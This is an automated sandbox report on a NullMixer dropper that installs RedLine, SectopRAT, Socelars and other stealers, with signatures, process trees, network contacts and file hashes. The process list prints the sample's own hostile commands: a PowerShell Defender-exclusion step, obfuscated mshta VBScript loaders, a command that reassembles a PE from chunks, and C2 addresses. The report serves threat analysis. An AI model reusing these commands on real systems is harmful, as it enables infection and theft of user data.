Analysis Overview
SHA256
28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db
Threat Level: Known bad
The file 28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe was found to be: Known bad.
Malicious Activity Summary
Onlylogger family
OnlyLogger
Nullmixer family
Socelars payload
GCleaner
Sectoprat family
Redline family
Socelars
Gcleaner family
Fabookie
SectopRAT
SectopRAT payload
Socelars family
Fabookie family
NullMixer
RedLine
RedLine payload
Detect Fabookie payload
OnlyLogger payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
ASPack v2.12-2.42
Reads user/profile data of web browsers
Drops Chrome extension
Checks installed software on the system
Looks up geolocation information via web service
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Unsigned PE
Browser Information Discovery
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Enumerates system info in registry
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-22 09:57
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-22 09:57
Reported
2024-11-22 10:00
Platform
win7-20241010-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 924 set thread context of 2720 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0741b6b6c3.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07778dd9fc6d53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0741b6b6c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0752b359bd184a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07e3a022a8656c5ca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07be2debb1a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun075246a0bffeab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0752b359bd184a.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe
"C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0752b359bd184a.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07be2debb1a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun075246a0bffeab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07778dd9fc6d53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07fcb30681127.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0750d1e499.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0741b6b6c3.exe
Sun0741b6b6c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07e3a022a8656c5ca.exe
Sun07e3a022a8656c5ca.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07778dd9fc6d53.exe
Sun07778dd9fc6d53.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07be2debb1a.exe
Sun07be2debb1a.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0752b359bd184a.exe
Sun0752b359bd184a.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07dc9d2dae027.exe
Sun07dc9d2dae027.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07fcb30681127.exe
Sun07fcb30681127.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun075246a0bffeab.exe
Sun075246a0bffeab.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0750d1e499.exe
Sun0750d1e499.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe
Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe
Sun0794d0eebce1.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 452
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 276
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| N/A | 127.0.0.1:49313 | tcp | |
| N/A | 127.0.0.1:49316 | tcp | |
| NL | 45.133.1.182:80 | tcp | |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | ggg-cl.biz | udp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| NL | 45.133.1.107:80 | tcp | |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 2.23.181.156:80 | www.microsoft.com | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | d07bd0ebe80eee3d1566618caa51672f |
| SHA1 | 28e747a9cbd035992c8fc7381f6c060dfe4bcbbe |
| SHA256 | c1324e6974abc969b3dd0fa54a25c4089147352c81aeda3cbb2a24662866ad81 |
| SHA512 | 2dccd7c8af21010ab54ca366a2a6deb2ef6a1355604ebb0e0bd158e4d761f32d632b3001b321cc174423a5ff303c3a1df4054f24ef7d04b48167522eb303d9ab |
\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe
| MD5 | 2d62b8cf0d215971e12220d96a099e81 |
| SHA1 | 72e43b82e9510321dbb5130d35d09acd850c7ad8 |
| SHA256 | bec993083a69304244f13e191173e31d23c634567ab21484258195086112aa40 |
| SHA512 | e0763f93143060599658b64cc3c0fa8e8be62c4af2567ab08868492546f200bb5a91b367d2eea296b0a6d71c39a0f0000d71a66aabc1d36664d01dedbfbc5f59 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/2788-61-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2788-64-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2788-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2788-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2788-80-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2788-79-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2788-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2788-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2788-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2788-74-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2788-73-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2788-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2788-86-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2788-85-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2788-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2788-84-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2788-83-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2788-82-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07778dd9fc6d53.exe
| MD5 | ecc773623762e2e326d7683a9758491b |
| SHA1 | ad186c867976dc5909843418853d54d4065c24ba |
| SHA256 | 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838 |
| SHA512 | 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07fcb30681127.exe
